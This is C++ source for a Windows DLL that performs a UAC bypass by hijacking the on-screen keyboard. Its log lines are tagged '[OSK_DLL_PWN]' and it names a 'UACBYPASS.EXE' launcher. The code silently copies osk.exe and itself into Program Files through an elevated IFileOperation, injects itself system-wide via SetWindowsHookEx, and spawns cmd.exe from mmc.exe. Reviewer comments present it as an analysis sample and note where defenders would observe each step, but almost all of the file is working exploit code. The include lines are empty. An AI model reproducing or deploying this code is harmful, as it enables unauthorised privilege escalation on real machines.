// DLL payload whose every code path starts in DllMain (DLL_PROCESS_ATTACH) and
// branches on the name of the host executable. All progress messages carry the
// debugger tag "[OSK_DLL_PWN]". Kept as an analysis sample; the comments below
// record what the code visibly does and where a defender would observe it
// (file writes, hook installation, process creation) — nothing more.

// NOTE(review): the three #include targets were lost in extraction; the header
// names cannot be recovered from this page.
#include
#include
#include
#pragma comment(lib, "Ole32.lib")    // CoInitializeEx / CoCreateInstance / CoUninitialize
#pragma comment(lib, "shell32.lib")  // SHCreateItemFromParsingName (IFileOperation helpers)

// Empty exported stubs. The author's comment says the names must be exported;
// the DLL does no work through them — all behaviour lives in DllMain/Payload.
void WINAPI InitializeOSKSupport() {}; // this function must be exported!
void WINAPI UninitializeOSKSupport() {}; // this function must be exported!

// Pass-through hook procedure: forwards every event to CallNextHookEx and does
// nothing else. It exists only so Payload has a procedure in this module to
// register with SetWindowsHookEx. Registering a system-wide hook with a module
// handle gets that module loaded into the hooked GUI processes — the hook
// installation itself (from a non-system DLL) is the observable event.
int WINAPI hook(int code, WPARAM wParam, LPARAM lParam) { return (CallNextHookEx(NULL, code, wParam, lParam)); };

// Module handle of this DLL, assigned in DllMain. Used as the hook module in
// Payload and to look up the DLL's own path in explorerThread.
HINSTANCE hinstance;

// Copies pszSrcItem into directory pszDest under the name pszNewName using the
// IFileOperation COM object with FOFX_REQUIREELEVATION set, i.e. the copy is
// performed by the elevated file-operation path rather than by this process.
// FOF_SILENT, FOF_NOCONFIRMATION and FOF_NOERRORUI suppress all dialogs. Each
// successful step logs a "[OSK_DLL_PWN]" line; the last line carries the
// HRESULT of PerformOperations in decimal and hex.
// NOTE(review): the name collides with the Win32 CopyFile macro (-> CopyFileW)
// from <windows.h>; whether that rename applies depends on the lost includes.
// Detection: a file operation writing into "C:\Program Files\..." on behalf of
// a non-elevated process (see the two callers in explorerThread).
void CopyFile(LPCWSTR pszSrcItem, LPCWSTR pszNewName, LPCWSTR pszDest)
{
    IFileOperation *pfo;
    IShellItem *psiFrom = NULL;
    IShellItem *psiTo = NULL;
    HRESULT hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE);
    if (SUCCEEDED(hr))
    {
        OutputDebugString(L"[OSK_DLL_PWN] CoInitializeEx");
        hr = CoCreateInstance(CLSID_FileOperation, NULL, CLSCTX_ALL, IID_PPV_ARGS(&pfo));
        if (SUCCEEDED(hr))
        {
            OutputDebugString(L"[OSK_DLL_PWN] CoCreateInstance");
            // Silent, elevation-requiring copy with no copy hooks and no error UI.
            hr = pfo->SetOperationFlags(FOF_NOCONFIRMATION | FOF_SILENT | FOFX_SHOWELEVATIONPROMPT | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION | FOF_NOERRORUI);
            if (SUCCEEDED(hr))
            {
                OutputDebugString(L"[OSK_DLL_PWN] SetOperationFlags");
                hr = SHCreateItemFromParsingName(pszSrcItem, NULL, IID_PPV_ARGS(&psiFrom));
                if (SUCCEEDED(hr))
                {
                    OutputDebugString(L"[OSK_DLL_PWN] SHCreateItemFromParsingName");
                    // A NULL destination leaves psiTo NULL and skips the lookup.
                    if (NULL != pszDest)
                    {
                        hr = SHCreateItemFromParsingName(pszDest, NULL, IID_PPV_ARGS(&psiTo));
                    }
                    if (SUCCEEDED(hr))
                    {
                        OutputDebugString(L"[OSK_DLL_PWN] SHCreateItemFromParsingName 2");
                        hr = pfo->CopyItem(psiFrom, psiTo, pszNewName, NULL);
                    }
                }
                // Queued copy is executed here; the HRESULT is only logged, never acted on.
                if (SUCCEEDED(hr))
                {
                    hr = pfo->PerformOperations();
                    WCHAR buff[100] = { 0 };
                    wsprintf(buff, L"[OSK_DLL_PWN] PerformOperations = %d %.8x", hr, hr);
                    OutputDebugString(buff);
                }
            }
            pfo->Release();
        }
        CoUninitialize();
    }
}

// Thread body started by Payload when the host is explorer.exe. Stages a copy of
// the system osk.exe and of this DLL itself (renamed osksupport.dll) into
// "C:\Program Files\Windows Media Player" via the elevated CopyFile above.
// Detection: creation of osk.exe / osksupport.dll under that Program Files
// directory, originating from an explorer.exe thread.
DWORD WINAPI explorerThread(LPVOID)
{
    CopyFile(L"C:\\windows\\system32\\osk.exe", L"osk.exe", L"C:\\Program Files\\Windows Media Player");
    // Path of this DLL, obtained through the handle saved in DllMain.
    WCHAR pathDll[1000] = { 0 };
    GetModuleFileName(hinstance, pathDll, 1000);
    OutputDebugString(pathDll);
    CopyFile(pathDll, L"osksupport.dll", L"C:\\Program Files\\Windows Media Player");
    return 0;
}

// Per-host behaviour, selected by substring match on the upper-cased path of
// the host executable. The branches are independent `if`s (no else / early
// return), but the OSK.EXE and MMC.EXE branches end with TerminateProcess, so
// nothing after them runs in those hosts. Called synchronously from DllMain.
void Payload()
{
    OutputDebugString(L"[OSK_DLL_PWN] Payload!");
    // NULL module handle -> path of the host process's main executable.
    WCHAR pathApp[1000] = { 0 };
    GetModuleFileName(NULL, pathApp, 1000);
    OutputDebugString(pathApp);
    wcsupr(pathApp);
    // Host osk.exe: install the pass-through hook system-wide (thread id 0),
    // wait 5 s, then kill the host. Observable: hook install + abrupt exit.
    if (wcsstr(pathApp, L"OSK.EXE"))
    {
        OutputDebugString(L"[OSK_DLL_PWN] Inside osk.exe");
        HOOKPROC addr = (HOOKPROC)GetProcAddress(hinstance, "hook");
        SetWindowsHookEx(WH_CALLWNDPROC, addr, hinstance, 0);
        Sleep(5000);
        TerminateProcess(GetCurrentProcess(), 0);
    }
    // Host = the author's own launcher executable (name hard-coded here):
    // installs the same system-wide hook and returns.
    if (wcsstr(pathApp, L"UACBYPASS.EXE")) // here must be name of exe-part
    {
        OutputDebugString(L"[OSK_DLL_PWN] Inside uacbypass.exe");
        HOOKPROC addr = (HOOKPROC)GetProcAddress(hinstance, "hook");
        SetWindowsHookEx(WH_CALLWNDPROC, addr, hinstance, 0);
    }
    // Host mmc.exe: launch cmd.exe and then kill the host. Failure to launch is
    // only logged. Observable: cmd.exe created as a child of mmc.exe.
    if (wcsstr(pathApp, L"MMC.EXE"))
    {
        OutputDebugString(L"[OSK_DLL_PWN] Inside mmc.exe");
        STARTUPINFO si;
        PROCESS_INFORMATION pi;
        ZeroMemory(&si, sizeof(si));
        si.cb = sizeof(si);
        ZeroMemory(&pi, sizeof(pi));
        // Writable buffer because CreateProcessW may modify its command line.
        WCHAR path[100] = L"C:\\windows\\system32\\cmd.exe";
        if (!CreateProcess(NULL, path, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi))
        {
            OutputDebugString(L"[OSK_DLL_PWN] Spawn cmd failed");
        }
        TerminateProcess(GetCurrentProcess(), 0);
    }
    // Host explorer.exe: run the file-staging work on a new thread; the thread
    // handle returned by CreateThread is discarded and never waited on.
    if (wcsstr(pathApp, L"EXPLORER.EXE"))
    {
        OutputDebugString(L"[OSK_DLL_PWN] Inside explorer.exe");
        DWORD dw= 0;
        CreateThread(NULL, NULL, explorerThread, NULL, 0, &dw);
    }
}

// Entry point. Everything happens on DLL_PROCESS_ATTACH: the module handle is
// saved into the global `hinstance` and Payload runs to completion (or
// terminates the host) before the loader returns. All other reasons are no-ops.
// Always reports success, so the host never unloads the DLL as a failed load.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        hinstance = hModule;
        Payload();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}